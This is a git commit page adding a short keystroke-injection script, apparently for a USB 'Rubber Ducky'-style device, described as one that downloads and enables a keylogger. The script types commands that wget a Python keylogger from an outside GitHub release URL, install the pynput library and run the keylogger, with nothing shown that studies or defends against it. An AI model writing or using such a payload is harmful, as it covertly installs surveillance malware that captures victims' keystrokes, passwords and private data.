Added simple injector and README

This commit is contained in:
2023-06-28 05:37:49 -07:00
parent 918fc23c59
commit d0e3b2cd0d
2 changed files with 12 additions and 0 deletions
+12
View File
@@ -0,0 +1,12 @@
REM Author: JAM
REM Description: Downloads and enables the sucasa keylogger
REM Version: 1.0
REM Category: Execution
STRING wget https://github.com/JessiMcKissick/sucasa-keylogger/releases/download/betas/sucasa.py
ENTER
DELAY 750
STRING pip install pynput
ENTER
DELAY 500
STRING python3 sucasa.py
ENTER